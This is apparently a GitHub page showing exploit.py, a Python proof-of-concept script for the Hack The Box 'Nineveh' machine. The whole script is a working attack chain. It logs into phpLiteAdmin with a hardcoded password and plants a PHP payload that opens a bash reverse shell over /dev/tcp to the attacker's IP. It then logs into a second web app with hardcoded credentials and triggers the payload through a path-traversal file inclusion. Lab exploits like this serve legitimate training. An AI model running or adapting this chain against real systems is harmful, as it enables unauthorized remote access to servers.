-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
53 lines (48 loc) · 4.31 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import argparse
import requests
from urllib.parse import quote
from time import sleep
requests.packages.urllib3.disable_warnings()
def Get_Arguments():
parser=argparse.ArgumentParser(description="Nineveh machine LFI to RCE ")
parser.add_argument("-ip",help="local IP address",required=True)
parser.add_argument("-t","--target",help="target ip address",required=True)
parser.add_argument("-lp","--listen_port",help="listening port for capturing the reverse shell",required=True)
args=parser.parse_args()
return args.ip,args.target,args.listen_port
ip,target,lp = Get_Arguments()
print("[*] Starting POC for Nineveh machine hack the box.....")
print("[*] Make sure to open netcat listener on your specified port! (for example nc -lnvp 443)\n")
s1=requests.session()
r=s1.post("https://{0}/db/index.php".format(target), data={"password":"password123",
"remember":"yes","login":"Log+In","proc_login":"true"},verify=False)
if r.status_code == 200:
print("[*] Connected successfully to phpliteadmin v1.9 panel")
sleep(3)
print("[*] Creating new database 'hack.php'...")
https_cookies = {"pla3412": "password123", "pla3412_salt": "0", "PHPSESSID": "pcroh40mg5buvqniidunp4k761"}
https_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Referer": "https://"+target+"/db/index.php?switchdb=%2Fvar%2Ftmp%2Fhack.php", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://"+target, "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers", "Connection": "close"}
r=s1.post("https://{0}/db/index.php".format(target),headers=https_headers,cookies=https_cookies,data={"new_dbname":"hack.php"},verify=False)
r=s1.get("https://{0}/db/index.php?switchdb=%2Fvar%2Ftmp%2Fhack.php".format(target),verify=False)
sleep(3)
print("[*] Creating table in the new database...")
r=s1.post("https://{0}/db/index.php".format(target),params={"action":"table_create"},data={"tablename":"table","tablefields":"1","createtable":"Go"},verify=False)
r=s1.post("https://{0}/db/index.php".format(target),params={"action":"table_create","confirm":"1"},data={"tablename":"table","rows":"1",
"0_field":"info","0_type":"TEXT","0_defaultvalue":"a"},verify=False)
sleep(3)
print("[*] Inserting malicious php code to table row...")
payload="<?php `/bin/bash -c 'bash -i >& /dev/tcp/{0}/{1} 0>&1'` ?>".format(ip,lp)
r=s1.post("https://{0}/db/index.php".format(target),params={"table":"table","action":"row_create","confirm":"1"},
data={"numRows": "1", "function_0_info": '', "0:info": payload, "fields": "info"},verify=False)
print("[*] The php code is now inserted in table row!")
sleep(3)
http_cookies = {"PHPSESSID": "pcroh40mg5buvqniidunp4k761"}
http_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+target, "Connection": "close", "Referer": "http://"+target+"/department/login.php", "Upgrade-Insecure-Requests": "1"}
r=requests.post("http://"+target+":80/department/login.php",headers=http_headers,cookies=http_cookies,data={"username": "admin", "password": "1q2w3e4r5t", "rememberme": "on"},allow_redirects=True)
if r.status_code == 302:
print("[*] Connected to the http server succesfully")
sleep(3)
print("[*] Using LFI vulnerability to access our php code...")
second_request_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
r=requests.get("http://"+target+":80/department/manage.php?notes=/files/ninevehNotes.txt/../../var/tmp/hack.php",headers=second_request_headers,cookies=http_cookies)
print("[*] LFI request was done, check your netcat listener for the reverse shell!")